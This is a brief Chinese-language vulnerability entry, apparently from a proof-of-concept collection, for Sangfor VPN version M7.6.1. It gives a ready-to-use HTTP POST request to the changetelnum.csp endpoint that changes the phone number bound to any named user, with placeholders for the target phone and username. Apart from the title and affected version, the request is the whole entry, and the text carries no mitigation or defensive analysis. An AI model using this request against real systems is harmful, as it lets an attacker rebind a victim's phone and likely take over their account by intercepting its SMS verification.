跳转至

深信服VPN任意修改绑定手机

影响范围

M7.6.1

漏洞POC

https://127.0.0.1/por/changetelnum.csp?apiversion=1 
POST:
newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1